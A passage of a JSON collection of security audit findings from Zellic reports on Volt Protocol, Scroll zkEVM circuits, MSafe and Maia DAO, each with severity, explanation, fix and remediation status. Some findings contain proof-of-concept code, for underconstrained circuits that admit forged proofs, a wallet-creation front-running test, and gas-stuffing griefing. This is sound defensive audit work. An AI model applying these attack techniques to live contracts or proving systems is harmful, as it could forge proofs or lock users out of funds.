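contract ShadowingExample {
    address public counterPartyRegistry;

    // Bad: the parameter shadows the state variable, so any reference to
    // counterPartyRegistry inside this function resolves to the parameter,
    // never to storage. The compiler emits only a warning.
    function configureShadowed(address counterPartyRegistry) external {
        // counterPartyRegistry here is the parameter, not the state variable
    }

    // Good: a distinct parameter name keeps the storage write unambiguous.
    function configure(address counterPartyRegistryAddr) external {
        counterPartyRegistry = counterPartyRegistryAddr;
    }
}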
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf"
  },
  {
    "title": "3.1 Missing test suite code coverage",
    "labels": [
      "Zellic"
    ],
    "body": "Target: MultiRateLimited Severity: Low Impact: Informational Category: Code Maturity Likelihood: n/a Some functions in the smart contract are not covered by any unit or integration tests, to the best of our knowledge. We ran both the Hardhat test suite and the Forge tests. The following functions do not have test coverage: MultiRateLimited.sol: getLastBufferUsedTime. These functions are extremely simple, so we do not see this as a significant issue. We reviewed all untested functions with increased scrutiny. Fortunately, we did not find any additional vulnerabilities. Other than these minor flaws, the code base otherwise has nearly 100% code coverage as of the time of writing. We applaud Volt Protocol for their commitment to thorough testing. Because correctness is so critically important when developing smart contracts, we recommend that all projects strive for 100% code coverage. Testing should be an essential part of the software development lifecycle. No matter how simple a function may be, untested code is always prone to bugs. Expand the test suite so that all functions and their branches are covered by unit or integration tests. The issue has been acknowledged by Volt Protocol, and a fix is pending.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Volt Protocol - Zellic Audit Report.pdf"
  },
  {
    "title": "3.2 Time functions rely on an unverified external date library",
    "labels": [
      "Zellic"
    ],
    "body": "Target: ScalingPriceOracle Severity: n/a Impact: Informational Category: Business Logic Likelihood: n/a The ScalingPriceOracle is designed so that new CPI data from the Chainlink oracle can be requested once a month: at least 28 days between requests, and only on the 15th day of the month or later. To calculate the current day, the contract uses block.timestamp and the popular BokkyPooBah\u2019s DateTime Library. This library contains an algorithm to convert from Unix timestamp days since epoch to the current calendar date. int256 __days = int256(_days); int256 L = __days + 68569 + OFFSET19700101; int256 N = (4 * L) / 146097; L = L - (146097 * N + 3) / 4; int256 _year = (4000 * (L + 1)) / 1461001; L = L - (1461 * _year) / 4 + 31; int256 _month = (80 * L) / 2447; int256 _day = L - (2447 * _month) / 80; L = _month / 11; _month = _month + 2 - 12 * L; _year = 100 * (N - 49) + _year + L; Since this code is crucial to the functionality of the contract, and its design is not clearly documented, we considered the risk of a possible bug in this dependency. A bug in the dependency could cause the ScalingPriceOracle to malfunction or lock up. This is mitigated by the fact that the ScalingPriceOracle is kept behind a proxy (OraclePassThrough), but we still wanted to verify the correctness of this function. To do so, we compared the results of the BokkyPooBah algorithm with a known ground truth (Python\u2019s datetime library). We computed values with both methods for all timestamp values +/- 30 years from the current date and found that the results were all correct. We also formally verified the correctness of the algorithm against musl libc\u2019s gmtime function by using an SMT solver. In the future, continue to carefully verify the correctness of external dependencies when adding them to the code base.
There have been several well-known security incidents caused by external dependencies in the past. No remediation is necessary, as we successfully verified that the dependencies are correct.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Volt Protocol - Zellic Audit Report.pdf"
  },
  {
    "title": "3.3 Some functions can be implemented more efficiently",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Deviation Severity: Low Impact: Informational Category: Gas Optimization Likelihood: n/a The function calculateDeviationThresholdBasisPoints calculates an absolute difference of two numbers. It computes the absolute value of both the numerator and denominator separately, which is less efficient than computing the absolute value of the overall result. function calculateDeviationThresholdBasisPoints(int256 a, int256 b) public pure returns (uint256) { /// delta can only be positive uint256 delta = ((a < b) ? (b - a) : (a - b)).toUint256(); return (delta * Constants.BASIS_POINTS_GRANULARITY) / (a < 0 ? a * -1 : a).toUint256(); } The code can be refactored to compute the absolute value of the quotient at the end, rather than computing the quotient of two absolute values. This would eliminate a ternary expression. Volt Protocol acknowledged and optimized the code based on our suggestions.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Volt Protocol - Zellic Audit Report.pdf"
  },
  {
    "title": "1.1 Poseidon Hash\u2019s outputs are taken from capacity",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Poseidon Circuit, src/hash.rs Category: Cryptography Likelihood: N/A Severity: Informational Impact: N/A Sponge-based hash functions are based on (disregarding padding for brevity) a state of t = r + c field elements and a permutation \u03c0 on F_p^t. To hash the input, the state is initialized to zero and the input is first divided into chunks of r elements. The inputs are then repeatedly fed into the first r elements of the state, with the permutation applied after each chunk. This continues until the input is fully incorporated. Then, until the output is fully retrieved, the first r elements of the state are taken out, applying the permutation if the output is not full yet. However, this implementation of Poseidon, which uses t = 3, r = 2, c = 1 with the output being a single field element, takes said output from the capacity, i.e., the last c = 1 element, rather than from the rate, i.e., the first r elements. The construction of the hash does not match the definition of the sponge-based hash construction. Therefore, the implemented Poseidon hash function may not directly benefit from the previous cryptanalysis of Poseidon and other sponge-based hash functions. More research on the security of the Poseidon hash when the outputs are taken from the capacity, as well as research on how other projects have implemented the Poseidon hash, should be conducted. We note that the permutation used for the sponge is up to specification. This issue has been acknowledged by Scroll.
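To make the mismatch concrete, a sketch in LaTeX notation of the final squeeze under the parameters above (t = 3, r = 2, c = 1), where (s_1, s_2, s_3) denotes the state after the last permutation; the symbols H_sponge and H_impl are introduced here for illustration only:

\[
\underbrace{(s_1, s_2)}_{\text{rate},\ r = 2} \;\|\; \underbrace{s_3}_{\text{capacity},\ c = 1},
\qquad
H_{\mathrm{sponge}}(m) = s_1
\quad\text{vs.}\quad
H_{\mathrm{impl}}(m) = s_3 .
\]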
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.2 mpt_only being true leads to overconstrained circuits",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Poseidon Circuit, src/hash.rs Category: Overconstrained Circuits Likelihood: Low Severity: High Impact: High Description The Poseidon table supports two modes of hashing - an MPT mode for hashing two field elements and a Variable Length mode for hashing arbitrary-length inputs. The SpongeChip gets mpt_only as a struct element, which denotes whether the chip will be purely used for MPT purposes. Depending on whether mpt_only is true, the custom rows padded at the beginning of the table change. If it is true, there is only one custom row, filled with zeroes. If not, there are two rows, with the additional row representing a hash of an empty message. However, due to incorrect ordering of logic, the custom gate is enabled not only at offset 0 but also at offset 1. config.s_custom.enable(region, 1)?; if self.mpt_only { return Ok(1); } This means that the selector is incorrectly enabled at offset 1. The fact that a certain row is a custom row is represented with a selector, and it is constrained that a custom row should have 0 as the hash inputs and control value. meta.create_gate(\"custom row\", |meta| { let s_enable = meta.query_selector(s_custom); vec![ s_enable.clone() * meta.query_advice(hash_inp[0], Rotation::cur()), s_enable.clone() * meta.query_advice(hash_inp[1], Rotation::cur()), s_enable * meta.query_advice(control, Rotation::cur()), ] }); In the case where mpt_only is true, the values of hash_inp[0] and hash_inp[1] at offset 1 are the first two field elements that are used for hashing. Since these two values are overconstrained to be equal to 0, any hashing attempt with the two input values not equaling 0 will fail the ZKP verification. However, we did not find an instance where mpt_only is true in our current audit scope. A proof of concept can be done by using the tests in hash.rs, but using the chip construction with mpt_only set to true. Reorder the two pieces of logic as follows. if self.mpt_only { return Ok(1); } config.s_custom.enable(region, 1)?; This issue has been acknowledged by Scroll, and a fix was implemented in commit 912f5ed2.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.3 padding_shift is underconstrained in the bytecode circuit",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Bytecode Circuit, zkevm-circuits/src/bytecode_circuit/to_poseidon_hash.rs Category: Underconstrained Circuits Likelihood: High Severity: Critical Impact: Critical Description To apply the Poseidon hash to the bytecode, a circuit is required to put together 31 bytes into a field element and to take two field elements and put them into a Poseidon width. For the first part, the constraint system is set up roughly as follows. If it is the 31st byte or the very last byte, it is a \u201cfield border\u201d. The field_input column accumulates the bytes into a field element, i.e., field_input = byte * padding_shift if is_field_border_prev, else field_input_prev + byte * padding_shift. The padding_shift is the powers of 256, i.e.,
padding_shift := padding_shift_prev / 256 if not is_field_border_prev. If it is the 31st byte, padding_shift = 1. The last constraint is not enough, as we also need to constrain padding_shift = 1 when it is the very last byte, or at least have some way to constrain padding_shift for the last chunk of the bytecode, which might not be exactly 31 bytes. This vulnerability can be verified by modifying assign_extended_row and unroll_to_hash_input so that the padding_shift values for the last chunk of the bytecode are modified. let bytes_in_field_index_inv_f = F::from((BYTES_IN_FIELD - bytes_in_field_index) as u64) .invert() .unwrap_or(F::zero()); let mut padding_shift_f = F::from(256 as u64) .pow_vartime([(BYTES_IN_FIELD - bytes_in_field_index) as u64]); let vuln = F::from(13371337 as u64); if code_index / 31 == code_length / 31 { padding_shift_f = padding_shift_f * vuln; } let vuln = F::from(13371337 as u64); let (msgs, _) = code .chain(std::iter::repeat(0)) .take(fl_cnt * BYTES_IN_FIELD) .fold((Vec::new(), Vec::new()), |(mut msgs, mut cache), bt| { cache.push(bt); if cache.len() == BYTES_IN_FIELD { let mut buf: [u8; 64] = [0; 64]; U256::from_big_endian(&cache).to_little_endian(&mut buf[0..32]); let ret = F::from_bytes_wide(&buf); if msgs.len() == fl_cnt - 1 { msgs.push(ret * vuln); } else { msgs.push(F::from_bytes_wide(&buf)); } cache.clear(); } (msgs, cache) }); As of now, the padding_shift for the very last byte is not constrained at all, unless the length of the bytecode is a multiple of 31. By setting padding_shift for the last byte appropriately, the last field element for the Poseidon hash can be set to any field element. For example, this may lead to two different bytecodes hashing to the same field element. We recommend adding a constraint on padding_shift for the last chunk of the bytecode. We note that constraining padding_shift = 1 when it is the field border leads to different field values being mapped for the final chunk of the bytecode than the current implementation. For example, the final chunk 0x01 will map to 1, rather than the current implementation\u2019s value of pow(256, 30). This issue has been acknowledged by Scroll, and a fix was implemented in commit e8aecb68.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.4 Missing range checks in MulAdd chip",
    "labels": [
      "Zellic"
    ],
    "body": "Target: MulAdd Chip, gadgets/src/mul_add.rs Category: Underconstrained Circuits Severity: Critical Impact: High Likelihood: High The MulAdd chip checks the following relation: a * b + c == d (mod 2^256). To perform this calculation, the chip has to break up each number into smaller pieces (limbs), which vary in size from 64 bits to 128 bits. There are also auxiliary elements in the chip used for carry, where each limb is constrained to be 8 bits in size. As the field-element size in Halo2 is 254 bits, each of these limbs must have additional range checks to ensure that these limbs are properly constructed. Currently, there are no range checks on any of the individual elements used in the MulAdd chip.
Following is a list of elements used by the circuits and the appropriate range checks that need to be performed: a_limb0 - a_limb3: [0, 2^64); b_limb0 - b_limb3: [0, 2^64); c_lo, c_hi: [0, 2^128); d_lo, d_hi: [0, 2^128); carry_lo0 - carry_lo8: [0, 2^8); carry_hi0 - carry_hi8: [0, 2^8). By allowing values beyond the intended range into these elements, one can pass the constraints used in the MulAdd chip with incorrect values. As an example, one of the constraints checked in the chip is: t0 = a0 \u00b7 b0, t1 = a0 \u00b7 b1 + a1 \u00b7 b0, t0 + t1 \u00b7 2^64 + c_lo = d_lo + carry_lo \u00b7 2^128. Without the proper range checks on carry_lo, one can generate a fake proof for any values of a, b, c, and d by calculating and assigning the appropriate value to the limbs of carry_lo. We recommend using the RangeCheckGadget to constrain the elements used in the chip to their expected values as mentioned above. This issue has been acknowledged by Scroll, and a fix was implemented in commit b20bed27.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.5 Incorrect calculation of overflow value in MulAdd chip.",
    "labels": [
      "Zellic"
    ],
    "body": "Target: MulAdd Chip, gadgets/src/mul_add.rs Category: Coding Mistakes Likelihood: Low Severity: Low Impact: Low The MulAdd chip has an additional output which calculates if there was any overflow in the calculation of a * b + c: overflow = carry_hi_expr.clone() + a_limbs[1].clone() * b_limbs[3].clone() + a_limbs[2].clone() * b_limbs[2].clone() + a_limbs[3].clone() * b_limbs[2].clone() + a_limbs[2].clone() * b_limbs[3].clone() + a_limbs[3].clone() * b_limbs[2].clone() + a_limbs[3].clone() * b_limbs[3].clone(); The actual formula to calculate this value is (a1 \u00b7 b3 + a2 \u00b7 b2 + a3 \u00b7 b1) + (a2 \u00b7 b3 + a3 \u00b7 b2) \u00b7 2^64 + (a3 \u00b7 b3) \u00b7 2^128. In the implementation, the third term is written as a3 \u00b7 b2 when it should be a3 \u00b7 b1. Within the zkevm circuits, the overflow parameter is only used in exp_circuit.rs as part of a parity-check mul gadget. There, the overflow is tested to be either zero or non-zero. As the mistake in the implementation only affects the correctness of the value of the overflow, there is no security impact. In the future, if the exact value of the overflow is used as part of another circuit, this may cause correctness issues. Fix the mistake in the implementation of the overflow calculation. This issue has been acknowledged by Scroll, and a fix was implemented in commit d5ca004b.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.6 ExpCircuit has an under-constrained exponentiation algorithm",
    "labels": [
      "Zellic"
    ],
    "body": "Target: ExpCircuit, zkevm-circuits/src/exp-circuit.rs Category: Underconstrained Circuits Severity: Critical Impact: High Likelihood: High The ExpCircuit is used to calculate and check the results of the EXP opcode from the EVM. Using the variables from the implementation, the following formula is checked: base^exponent == exponentiation (mod 2^256). The circuit calculates the result using the exponentiation-by-squaring method. Pseudocode of the algorithm is as follows: # MulAdd(a, b, c) constrains a * b + c == d if is_odd(exponent): constrain: MulAdd(2, exponent/2, 1) == exponent; result' = result * base else: constrain: MulAdd(2, exponent/2, 0) == exponent; result' = result * result When the parity check on the exponent is odd, there are no checks to ensure that the previous exponent was even.
However, this is not a security issue, as it only affects the efficiency of the algorithm, not its correctness. For the case when the exponent is even, there are no constraint checks on the first argument to the MulAdd chip to ensure that a = 2. With a specific assignment of witness values, a malicious prover can prove the calculation of an incorrect exponentiation from the circuit. An example of a malicious witness assignment for the ExpTable can be seen below: [Table: malicious witness assignment for the ExpTable with columns base, exp, res, p_a, p_b, p_c, p_d, m_a, m_b, and m_d; the data rows were lost in extraction.] The column exp denotes the running exponent value, and the column res represents the running value of the exponentiation. Here, we can see that an attacker can incorrectly calculate the result that 5^12 == 15,625 due to the under-constrained circuits. We recommend adding a constraint to check that the first argument to the parity-check MulAdd gadget is 2 when the parity is even (c = 0). This issue has been acknowledged by Scroll, and a fix was implemented in commit 9b46ddbf.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.7 Bytecode Tag should be constrained to a boolean in BytecodeCircuit",
    "labels": [
      "Zellic"
    ],
    "body": "Target: Bytecode Circuit, zkevm-circuits/src/circuits.rs Severity: Low Impact: Low Category: Underconstrained Circuits Likelihood: Low The tag value in the BytecodeTable is used to determine whether a byte is a header (tag = 0) or code (tag = 1). This tag is used in selectors such as is_header and is_byte to enable or disable certain constraints. These selectors make use of boolean expressions such as and::expr, or::expr, and not::expr applied on the tag column and other selector columns. These expressions have the invariant that the inputs to them must be either 0 or 1. If that is not the case, it can lead to unintended results. The is_header selector is calculated as not(tag): let is_header = |meta: &mut VirtualCells| { not::expr(meta.query_advice(bytecode_table.tag, Rotation::cur())) }; pub mod not { /// Returns an expression that represents the NOT of the given expression. pub fn expr(b: E) -> Expression { 1.expr() - b.expr() } } In the normal use case, is_header is true/non-zero when tag = 0. However, if the value of tag is 2, then is_header is also non-zero, and it acts as true. Another unintended result happens when these selectors are multiplied with actual witness values, as in the case of lookups: meta.lookup_any( \"push_data_size_table_lookup(cur.value, cur.push_data_size)\", |meta| { let enable = and::expr(vec![ // ... is_byte(meta), ]); // ... for i in 0..PUSH_TABLE_WIDTH { constraints.push(( enable.clone() * meta.query_advice(lookup_columns[i], Rotation::cur()), meta.query_fixed(push_table[i], Rotation::cur()), )) } }, ); The is_byte expression directly uses the value of the tag, so we can control the value of enable to be arbitrary. This allows us to assign any value we want to the first column of the lookup query, which will allow us to bypass the lookup check. In the case of the bytecode circuit, we were unable to find any particular way to make invalid bytecode pass the constraints because of the large number of constraints on each row. As a proactive measure, we recommend using the require_boolean constraint to ensure that the value of bytecode_table.tag is 0 or 1, as it violates the invariants expected by the boolean expressions used in the selectors.
This issue has been acknowledged by Scroll, and a fix was implemented in commit 267865d3.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.8 Redundant boolean constraint in Batched IsZero",
    "labels": [
      "Zellic"
    ],
    "body": "Target: BatchedIsZeroChip, gadgets/src/batched_is_zero.rs Category: Overconstrained Circuits Likelihood: N/A Severity: Informational Impact: N/A The BatchedIsZero chip takes in as input a list of values and a nonempty_witness and sets is_zero to 1 if all the input values are zero, and 0 otherwise. Currently, there is a constraint that checks that the value of is_zero is a boolean, i.e., that it is 0 or 1. We show that it is not necessary to have this constraint, as it is implicitly checked by the other two constraints in the chip. 1. is_zero is 0 if there is any non-zero value: This constraint multiplies is_zero with all the values and ensures that all the results are 0. If there is any non-zero value, then is_zero must be 0, or else this constraint will fail. 2. is_zero is 1 if values are all zero: This constraint calculates (1 - is_zero) * PROD(1 - value * nonzero_witness). We know from the previous constraint that if there are any non-zero values, then is_zero must be equal to 0. This means that all the values are 0, and the terms in the product evaluate to 1. Therefore, the only possible value for is_zero which satisfies the constraint is 1. This shows that the value of is_zero can only be 0/1 based on the two constraints mentioned above. We suggest removing this redundant constraint to reduce the total number of constraints, but we also understand if you would like to keep this constraint to maintain the clarity of the circuit implementation. This issue has been acknowledged by Scroll.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "1.9 Redundant boolean constraint in Exponentiation Circuit",
    "labels": [
      "Zellic"
    ],
    "body": "Target: ExpCircuit, zkevm-circuits/src/exp-circuit.rs Category: Overconstrained Circuits Likelihood: N/A Severity: Informational Impact: N/A There is a constraint in the ExpCircuit which ensures that the column is_step is always boolean. // is_step is boolean. cb.require_boolean( \"is_step is boolean\", meta.query_fixed(exp_table.is_step, Rotation::cur()), ); is_step is a Fixed Column whose values cannot be changed during witness synthesis and proving. Thus, this constraint is redundant and can be removed. We recommend removing this prover-time constraint and instead adding an assert to ensure that the correct values are assigned to the is_step column during circuit compilation. This issue has been acknowledged by Scroll.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf"
  },
  {
    "title": "3.1 Wallet creation is vulnerable to front-running attacks",
    "labels": [
      "Zellic"
    ],
    "body": "Target: creator Category: Business Logic Likelihood: Medium Severity: High Impact: High The deployment of momentum safes is deterministic. This means that calls to init_wallet_creation(\u2026) can be front-run and safe deployment can be blocked. The call to init_wallet_creation(\u2026) passes control to init_wallet_creation_internal(\u2026), public(friend) fun init_wallet_creation_internal( s: &signer, owners: vector<address>, threshold: u8, init_balance: u64, payload: vector<u8>, signature: vector<u8>, module_address: address, ) acquires PendingMultiSigCreations, MultiSigCreationEvent { let public_keys = get_public_keys(&owners); let pending = borrow_global_mut<PendingMultiSigCreations>(THIS); let (msafe_address, nonce) = derive_new_multisig_auth_key( pending, signer::address_of(s), public_keys, threshold ); // Create the momentum safe wallet and send the initial fund for gas fee. aptos_account::create_account(msafe_address); ... } which calls aptos_account::create_account(msafe_address); on the deterministic address generated from the call to derive_new_multisig_auth_key(pending, signer::address_of(s), public_keys, threshold). We created two unit tests to demonstrate this issue. For one, test_frontrun_no calls init_wallet_creation normally and passes if the call does not abort. However, test_frontrun calculates msafe_address and registers an account at that address, passing if the call to init_wallet_creation aborts. An excerpt of the PoC is below: fun test_frontrun() { ... let msafe_address = utils::address_from_bytes(utils::derive_multisig_auth_key(pubkeys, threshold, 0)); // This causes the call to creator::init_wallet_creation_internal to fail aptos_account::create_account(msafe_address); creator::init_wallet_creation( owner0, owner_addresses, threshold, init_balance, test_data.wallet_creation_payload, init_creation_sig, ); ... } We have provided the full PoC to Momentum Safe for reproduction and verification. A malicious user can monitor the mempool for pending init_wallet_creation(\u2026) transactions and block them by submitting transactions with a higher gas price that call aptos_account::create_account(msafe_address). This is possible because the address msafe_address is directly readable from the mempool. An attacker could target specific users or groups of users, or eventually take on the entire protocol. Alter the design of the msafe to use nondeterministic addresses. Alternatively, if the address already exists, ensure that it is a multisignature account corresponding to the set of owners and multisignature threshold of the wallet being created. In commit a5517d01, Momentum Safe has implemented the following fix: // Create the momentum safe wallet and send the initial fund for gas fee. if (!account::exists_at(msafe_address)) { aptos_account::create_account(msafe_address); }; assert!(account::get_sequence_number(msafe_address) == 0, ESEQUENCE_NUMBER_MUST_ZERO); If there is no Aptos account at the msafe_address, a new Aptos account will be created. However, more importantly for the case of front-running, if an Aptos account has already been deployed, then the call to init_wallet_creation will not fail. This is a suitable fix because the msafe_address has been generated based on the rules of the Aptos native multisignature framework. This ensures that only the true owners of the multisignature, as they are passed in as function arguments to init_wallet_creation, are in control of the msafe_address.
",
    "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf"
  },
  {
    "title": "3.2 Momentum safe deployment is vulnerable to max_gas attacks",
    "labels": [
      "Zellic"
    ],
    "body": "Target: creator Category: Business Logic Likelihood: Medium Severity: High Impact: Medium When momentum safes are deployed using momentum_safe::register(\u2026), the momentum safe metadata is retrieved using a call to creator::get_creation(\u2026), as shown below: public entry fun register( msafe: &signer, metadata: vector<u8> ) { ... let (owners, public_keys, nonce, threshold) = creator::get_creation(msafe_address); create_momentum(msafe, owners, public_keys, nonce, threshold, metadata); } The call to get_creation(\u2026) leads to an internal call to simple_map::borrow(&pending.creations, &msafe_address);: public fun get_creation( msafe_address: address ): ( vector<address>
, vector<vector<u8>>, u64, u8 ) acquires PendingMultiSigCreations { ... let creation = simple_map::borrow(&pending.creations, &msafe_address); } The underlying pending data structure can be stuffed with pending safes by any user who 1) calls registry::register(\u2026) and 2) repeatedly calls creator::init_wallet_creation with unique owners and thresholds: public(friend) fun init_wallet_creation_internal( s: &signer, owners: vector<address>
, threshold: u8, init_balance: u64, payload: vector<u8>, signature: vector<u8>, module_address: address, ... ) acquires PendingMultiSigCreations, MultiSigCreationEvent { let (msafe_address, nonce) = derive_new_multisig_auth_key( pending, signer::address_of(s), public_keys, threshold ); simple_map::add(&mut pending.creations, msafe_address, new_creation); } This creates an opportunity for max_gas attacks because simple_map::borrow(\u2026) uses a binary search algorithm, which is O(sqrt(N)). Use a hash map for storing pending safe creations in the PendingMultiSigCreations struct. Momentum Safe has addressed the griefing attack vector by replacing aptos::simple_map with aptos::table in commit 18c8bbf5.",
    "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf"
  },
  {
    "title": "3.3 Transactions can be blocked from max_gas attacks",
    "labels": [
      "Zellic"
    ],
    "body": "Target: momentum_safe Category: Business Logic Likelihood: Medium Severity: High Impact: Medium Before transactions can be submitted for execution, all momentum safe owners must make calls to momentum_safe::submit_signature(\u2026). This retrieves the pending transaction information through a call to a simple_map: public entry fun submit_signature( msafe_address: address, pk_index: u64, tx_hash: vector<u8>, signature: vector<u8> ) acquires Momentum, MomentumSafeEvent { ... let tx = simple_map::borrow_mut(&mut momentum.txn_book.pendings, &tx_hash); } The underlying pendings data structure can be stuffed with pending transactions by a malicious member of the momentum safe who repeatedly calls momentum_safe::init_transaction(\u2026): public entry fun init_transaction( msafe_address: address, pk_index: u64, payload: vector<u8>, signature: vector<u8>, ) acquires Momentum, MomentumSafeEvent { ... // Validate the transaction payload let (tx_sn, cur_sn) = validate_txn_payload(msafe_address, payload); add_to_txn_book(&mut momentum.txn_book, tx_sn, new_tx); // Prune previous transactions with stale sequence number try_prune_pre_txs(&mut momentum.txn_book, cur_sn - 1); ... } This creates an opportunity for max_gas attacks because simple_map::borrow(\u2026) uses a binary search algorithm, which is O(sqrt(N)). An attacker could stuff the txn_book.pendings to the point where the compute costs of simple_map::borrow(\u2026) exceed max_gas. This would prevent anyone in the momentum safe from being able to sign pending transactions. Because gas is cheap on Move-Aptos, this attack could potentially be financially feasible for a wide range of users. Use a hash map for storing the pending transactions in the txn_book. Similar to the previous finding, Momentum Safe has addressed the griefing attack vector by replacing aptos::simple_map with aptos::table in commit 18c8bbf5. We applaud Momentum Safe for their vigilance during the auditing process. They also uncovered a similar griefing attack vector affecting the registry::OwnerMomentumSafes data structure. The use of std::vector for OwnerMomentumSafes.pendings and OwnerMomentumSafes.msafes has been replaced with a custom table_map located in table_map.move. 4 Formal Verification The Move prover allows for formal specifications to be written on Move code, which can provide guarantees on function behavior. During the audit period, we provided Momentum Safe with Move prover specifications, a form of formal verification.
We found the prover to be highly effective at evaluating the entirety of certain functions\u2019 behavior and recommend that the Momentum Safe team add more specifications to their code base. One of the issues we encountered was that the prover does not support bitwise operations yet. The following is a sample of the specifications provided.",
    "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf"
  },
  {
    "title": "4.1 msafe::creator Ensures the PendingMultisigCreations resource is created upon initialization. spec init_module { ensures exists<PendingMultiSigCreations>(signer::address_of(creator));",
    "labels": [
      "Zellic"
    ],
    "body": "4.1 msafe::creator Ensures the PendingMultisigCreations resource is created upon initialization. spec init_module { ensures exists<PendingMultiSigCreations>(signer::address_of(creator)); }",
    "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf"
  },
  {
    "title": "4.2 msafe::registry Ensures that the OwnerMomentumSafes resource is created upon register. spec register { ensures exists<OwnerMomentumSafes>(signer::address_of(s));",
    "labels": [
      "Zellic"
    ],
    "body": "4.2 msafe::registry Ensures that the OwnerMomentumSafes resource is created upon register. spec register { ensures exists<OwnerMomentumSafes>(signer::address_of(s)); }",
    "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf"
  },
  {
    "title": "4.3 msafe::transactions Ensures that the buffer does not overflow. spec set_pos_negative { ensures r.offset <= len(r.buffer); } spec set_pos { ensures r.offset <= len(r.buffer); } spec skip { ensures r.offset <= len(r.buffer);",
    "labels": [
      "Zellic"
    ],
    "body": "4.3 msafe::transactions Ensures that the buffer does not overflow. spec set_pos_negative { ensures r.offset <= len(r.buffer); } spec set_pos { ensures r.offset <= len(r.buffer); } spec skip { ensures r.offset <= len(r.buffer); }",
    "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf"
  },
  {
    "title": "4.1 Component: Composable Stable Pool Wrapper Module flow The module is a thin wrapper around the functionality that converts between shares and assets, using the Balancer pool\u2019s stable math logic. The module also gives protection against reentrancy while inside the view context, where state cannot be modified. The state being unmodifiable is accomplished by VaultReentrancyLib.sol, which tries to purposefully trigger the actual reentrancy guard, expecting it to immediately revert when the reentrancy flag is mutated in a (read-only) view context. From the length of the revert data, it is possible to differentiate between a revert due to actual reentrancy or an attempt to modify state in a view context",
    "labels": [
      "Zellic"
    ],
    "body": "4.1 Component: Composable Stable Pool Wrapper Module flow The module is a thin wrapper around the functionality that converts between shares and assets, using the Balancer pool\u2019s stable math logic. The module also gives protection against reentrancy while inside the view context, where state cannot be modified. The state being unmodifiable is accomplished by VaultReentrancyLib.sol, which tries to purposefully trigger the actual reentrancy guard, expecting it to immediately revert when the reentrancy flag is mutated in a (read-only) view context.
From the length of the revert data, it is possible to differentiate between a revert due to actual reentrancy or an attempt to modify state in a view context.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO V2 Ecosystem - Zellic Audit Report.pdf" }, { "title": "4.2 Module: FlywheelBoosterGaugeWeight.sol Function: optIn(ERC20 strategy, FlywheelCore flywheel) 1. Performs the check that userGaugeflywheelId is not already set for msg.sender and corresponds to the strategy and flywheel addresses. 2. Performs the check that the strategy address is a trusted gauge. 3. Performs the check that the Flywheel contract was actually deployed over the bribesFactory. 4. Accrues rewards for the msg.sender on a strategy. 5. Increases the whole amount of flywheelStrategyGaugeWeight[strategy][flywheel] by the current user balance allocated to the strategy. 6. Adds the flywheel address to the array userGaugeFlywheels[msg.sender][strategy]. Zellic Maia DAO 7. Adds the index of flywheel from userGaugeFlywheels to the userGaugeflywheelId[msg.sender][strategy][flywheel]. Inputs", "labels": [ "Zellic" ], "body": "strategy \u2013 Constraints: The address should be a trusted gauge. \u2013 Impact: For this strategy address, the boostedTotalSupply value will be increased; further, this value will be used to accumulate global rewards on a strategy. flywheel \u2013 Constraints: The contract should be deployed over the bribesFactory. \u2013 Impact: The contract that manages token rewards. It distributes reward streams across various strategies and distributes them among the users of these strategies. Branches and code coverage (including function calls) Intended branches The userGaugeflywheelId != 0 after the call. 4\u25a1 Test coverage The flywheelStrategyGaugeWeight incremented. \u25a1 Test coverage Negative behavior Double optIn for the same strategy and flywheel. 4\u25a1 Negative test The strategy is not a gauge. 4\u25a1 Negative test The untrusted Flywheel contract. 4\u25a1 Negative test Function call analysis flywheel.accrue(strategy, msg.sender) \u2013 What is controllable? flywheel and strategy. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? If reverted, the user will not be able to optIn and the user\u2019s balance will not be able to take into account total supply. bHermesGauges(owner()).getUserGaugeWeight(msg.sender, address(strategy)) Zellic Maia DAO \u2013 What is controllable? strategy. \u2013 If return value controllable, how is it used and how can it go wrong? Return the user\u2019s allocated weight to that gauge (strategy). \u2013 What happens if it reverts, reenters, or does other unusual control flow? No problem \u2014 just view function. Function: optOut(ERC20 strategy, FlywheelCore flywheel) 1. Performs the check that the strategy and flywheel addresses were optIn by msg.sender. (b) Accrues rewards for the msg.sender on a strategy. (c) Decreases the whole amount of flywheelStrategyGaugeWeight[strategy][flywheel] by the current user balance allocated to the strategy. (d) Deletes the flywheel address from 